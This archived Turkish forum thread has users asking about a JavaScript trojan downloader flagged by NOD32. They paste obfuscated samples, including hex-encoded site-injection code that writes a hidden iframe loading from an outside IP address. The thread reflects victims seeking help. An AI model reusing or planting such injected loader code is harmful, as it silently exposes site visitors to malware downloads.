frozsgy Posted June 9, 2007 Share Posted June 9, 2007 Bir siteye girdiğimde NOD32 trojan uyarısı verdi ve engellettim. O adrese girince firefoxla bir js odu gördüm ve de kodu aldım. Bu kod nasıl bir trojan bulaştırabilir? <script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,u,p=0,s=0,w=0,t=Array(63,58,26,30,6,55,12,24,62,4,0,0,0,0,0,0,0,38,59,56,46,45,34,13,35,15,50,20,19,47,7,5,28,54,23,22,17,9,16,60,52,43,2,0,0,0,0,40,0,14,33,42,18,10,25,29,53,44,31,41,39,48,36,37,11,27,49,3,32,51,21,61,1,8,57);for(j=Math.ceil(l/b);j>0;j--){u='';for(i=Math.min(l,B);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){u+=String.fromCharCode(226^w&255);w>>=8;s-=2}else{s=6}}document.write(u)}}dc("Zs")</script>[/CODE]Kodun adı JS/TrojanDownloader.Psyme.CZ.Gen Link to comment Share on other sites More sharing options...
Pesimist Posted June 9, 2007 Share Posted June 9, 2007 Tam olarak bilmiyorum ama bir yorum yapayim bu numaralarin arka planı aslinda bir yazi yani bir kodlama bu kodlamanin aslıda bir trojen bu yorumu neye dayanarak yaptım derseniz eger linklerden msnler çaliniyordu o yollardan msn adresini kod yani sayilara dokerek link yapiliyordu ve msn çaliniyordu onu göz onunde bulundururarak bir yorum yaptim....[Yanlış olabilir.] Link to comment Share on other sites More sharing options...
Zeroo Posted December 23, 2007 Share Posted December 23, 2007 Bir siteye girdiğimde NOD32 trojan uyarısı verdi ve engellettim. O adrese girince firefoxla bir js odu gördüm ve de kodu aldım. Bu kod nasıl bir trojan bulaştırabilir? <script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,u,p=0,s=0,w=0,t=Array(63,58,26,30,6,55,12,24,62,4,0,0,0,0,0,0,0,38,59,56,46,45,34,13,35,15,50,20,19,47,7,5,28,54,23,22,17,9,16,60,52,43,2,0,0,0,0,40,0,14,33,42,18,10,25,29,53,44,31,41,39,48,36,37,11,27,49,3,32,51,21,61,1,8,57);for(j=Math.ceil(l/b);j>0;j--){u='';for(i=Math.min(l,B);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){u+=String.fromCharCode(226^w&255);w>>=8;s-=2}else{s=6}}document.write(u)}}dc("Zs")</script>[/CODE] Kodun adı JS/TrojanDownloader.Psyme.CZ.Gen Yaaa bugün bende de aynısı oldu Nod32 engelledi ama silemiyormuş.Çok korkuyorum :'( Bilgisayarına herhangi bir zararı oldu mu?Nasıl birşeymiş bu trojan biliyor musun?Ne gibi zararlar verirmiş? Link to comment Share on other sites More sharing options...
TeksasStyLe Posted December 23, 2007 Share Posted December 23, 2007 girdiğiniz site hangisi bizde kaspersky ile girelim bakalım . Link to comment Share on other sites More sharing options...
zafercan Posted February 8, 2008 Share Posted February 8, 2008 selamlar; nod32 benim kendi sitemde << JS/TrojanDownloader.Psyme.CZ.Gen truva atı >> diye bir virüs gösterdi bnde ftp deki hemen hemen tüm index dosyalarının hepsinde arama yaptım yaklaşık 10-12 adet aşağıda verdiğim kodları buldum ve imha ettim ama ne yazıki halen forumlara girdiğimde yine aynı virüsün uyarısını görüyorum ne yapmam lazım biraz yardımcı olurmusunuz. <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47ab57864b55c(v47ab57864b956){ function v47ab57864bd52 () {var v47ab57864c151=16; return v47ab57864c151;} return(parseInt(v47ab57864b956,v47ab57864bd52()));}function v47ab57864c54d(v47ab57864c947){ var v47ab57864d540=2; var v47ab57864cd47='';for(v47ab57864d158=0; v47ab57864d158<v47ab57864c947.length; v47ab57864d158+=v47ab57864d540){ v47ab57864cd47+=(String.fromCharCode(v47ab57864b55c(v47ab57864c947.substr(v47ab57864d158, v47ab57864d540))));}return v47ab57864cd47;} document.write(v47ab57864c54d('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D65363638306531393233207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A333433323030292B2765365C272077696474683D363530206865696768743D353238207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>[/CODE] Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.